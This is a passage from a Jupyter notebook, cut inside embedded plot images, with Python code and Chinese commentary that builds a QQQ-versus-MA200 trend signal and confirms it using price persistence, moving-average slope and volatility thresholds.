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", + "text/plain": [ + "
" + ] + }, + "metadata": {}, + "output_type": "display_data" + } + ], + "source": [ + "fig, ax = plt.subplots(figsize=(12, 5))\n", + "ax.plot(sig.index, sig[\"close\"], label=\"QQQ Close\", linewidth=1.5)\n", + "ax.plot(sig.index, sig[\"ma200\"], label=\"MA200\", linewidth=1.4)\n", + "ax.fill_between(\n", + " sig.index,\n", + " sig[\"close\"],\n", + " sig[\"ma200\"],\n", + " where=(sig[\"close\"] > sig[\"ma200\"]),\n", + " alpha=0.12,\n", + " label=\"Above MA200\",\n", + ")\n", + "ax.set_title(\"QQQ vs MA200 (Base LRS Signal)\")\n", + "ax.legend(loc=\"upper left\")\n", + "plt.show()" + ] + }, + { + "cell_type": "markdown", + "id": "98020493", + "metadata": {}, + "source": [ + "## 2) 有效性判断:信号是否可靠\n", + "\n", + "### 逻辑说明\n", + "\n", + "避免“刚上穿就追、刚下破就砍”的假信号,加入三项确认:\n", + "\n", + "1. 连续 3 日在 MA200 上方(`above_3d`)\n", + "2. MA200 斜率为正(`ma200_slope_20 > 0`)\n", + "3. 波动不过热(20 日年化波动率低于滚动分位阈值)\n", + "\n", + "满足其中至少 2 项,判定为“有效多头信号”。" + ] + }, + { + "cell_type": "code", + "execution_count": 5, + "id": "8b21d707", + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "above_3d: 1\n", + "slope_ok: 1\n", + "vol_ok: 0\n", + "valid_score: 2\n", + "valid_long: YES\n" + ] + } + ], + "source": [ + "val = sig.copy()\n", + "\n", + "# 1) 连续站上 3 日:降低“刚上穿就回落”的假突破噪声\n", + "val[\"above_3d\"] = (val[\"base_long\"].rolling(3).sum() == 3).astype(int)\n", + "\n", + "# 2) slope_ok 阈值定义:MA200 的 20 日斜率 > 0 即为 OK\n", + "# 含义:长期均线本身在上行,趋势背景更健康\n", + "val[\"ma200_slope_20\"] = val[\"ma200\"].diff(20)\n", + "val[\"slope_ok\"] = (val[\"ma200_slope_20\"] > 0).astype(int)\n", + "\n", + "# 3) vol_ok 阈值定义:当前 20 日年化波动率 <= 过去 252 日滚动的 75% 分位\n", + "# 含义:不过度追逐高波动时段,避免“高噪音追涨”\n", + "ret = safe_pct_change(val[\"close\"], 1)\n", + "val[\"vol20_ann\"] = ret.rolling(20).std() * np.sqrt(252)\n", + "vol_q = val[\"vol20_ann\"].rolling(252).quantile(0.75)\n", + "val[\"vol_ok\"] = (val[\"vol20_ann\"] <= vol_q).astype(int)\n", + "\n", + "# 4) valid_score = 三项确认之和\n", + "# 为什么阈值是 >=2:\n", + "# - 3 选 2 是“稳健确认”与“信号及时性”的折中\n", + "# - 若要求 3/3,信号会过慢;若只要 1/3,噪声会太多\n", + "val[\"valid_score\"] = val[[\"above_3d\", \"slope_ok\", \"vol_ok\"]].sum(axis=1)\n", + "val[\"valid_long\"] = (val[\"valid_score\"] >= 2).astype(int)\n", + "\n", + "t = val.dropna().iloc[-1]\n", + "print(\"above_3d:\", int(t[\"above_3d\"]))\n", + "print(\"slope_ok:\", int(t[\"slope_ok\"]), \"(rule: ma200_slope_20 > 0)\")\n", + "print(\"ma200_slope_20:\", round(float(t[\"ma200_slope_20\"]), 4))\n", + "print(\"vol_ok:\", int(t[\"vol_ok\"]), \"(rule: vol20_ann <= vol_q_75)\")\n", + "print(\"vol20_ann:\", round(float(t[\"vol20_ann\"]), 4))\n", + "print(\"vol_q_75:\", round(float(vol_q.dropna().iloc[-1]), 4))\n", + "print(\"valid_score:\", int(t[\"valid_score\"]), \"(rule: >= 2)\")\n", + "print(\"valid_long:\", \"YES\" if int(t[\"valid_long\"]) == 1 else \"NO\")" + ] + }, + { + "cell_type": "code", + "execution_count": 6, + "id": "effb8616", + "metadata": {}, + "outputs": [ + { + "data": { + "image/png": "iVBORw0KGgoAAAANSUhEUgAAA84AAAJWCAYAAACJV97CAAAAOnRFWHRTb2Z0d2FyZQBNYXRwbG90bGliIHZlcnNpb24zLjEwLjAsIGh0dHBzOi8vbWF0cGxvdGxpYi5vcmcvlHJYcgAAAAlwSFlzAAAPYQAAD2EBqD+naQAA13lJREFUeJzs3Qd8U+X6B/BfRvcA2rKXbBABGeJCUVDEPXFdxXEV91YUF+JCxXFVrhNxXHHhFRVF7l8F90BBQPbeq4PRnWb8P8+bnDRpmzZp0+bknN/38wmlyWlymrdJznOe531ei8fj8YCIiIiIiIiIamSt+WoiIiIiIiIiEgyciYiIiIiIiGrBwJmIiIiIiIioFgyciYiIiIiIiGrBwJmIiIiIiIioFgyciYiIiIiIiGrBwJmIiIiIiIioFgyciYiIiIiIiGrBwJmIiMiEPB5PrHeBiIgobjBwJiKimFizZg1uu+02HH300TjkkEMwbNgw3HrrrVi1alXQdpdeeqm6xMInn3yCXr16Ydu2bTXeftJJJ+HUU08N+fMOhwOHH344xo8fH9bjyWO9+OKL6v+///67+l6+hvsz4fr2229x9913+78P97Gixel04q233sLZZ5+NQw89FAMHDlT/nz59unrOiIiI9MYe6x0gIiLzWbt2LS644AIVNN1///3Izs7Grl278O677+L888/HO++8o24TEydOhF6dc845ePbZZ7Fy5Ur06dOn2u3fffcd9u3bhzFjxkR833379sWHH36I7t27I9okaG2qx6rJAw88gP/7v//DuHHj1EkTt9uNP//8E//617+wcOFC/Pvf/26S/SAiIgoXA2ciImpyb775Jlq0aIHXX38ddnvlR9EJJ5yA0aNH46WXXsJrr72mrmuqYK4+zjrrLDz//PP4/PPPawycZ82ahYMOOgiHHXZYxPednp7uP3nQ2JrysXbs2KGel4cfflidJNEcc8wxyMrKwuOPP46lS5eif//+TbI/RERE4WCpNhERNbm8vDw1x1YyjYFSU1Nx77334uSTTw5Zql1UVIQHH3wQRx55pCrxlXJvyaBKqXHgz9x3330q+D7uuOPQr18/XHjhhSogC/TNN9/g4osvVvcjmU8J2mfMmBH279G6dWsV8H355ZfVfpeCggL8+OOPOPfcc9X3Uu4tJdtSki4ZXtl/+X7v3r013ndN5dML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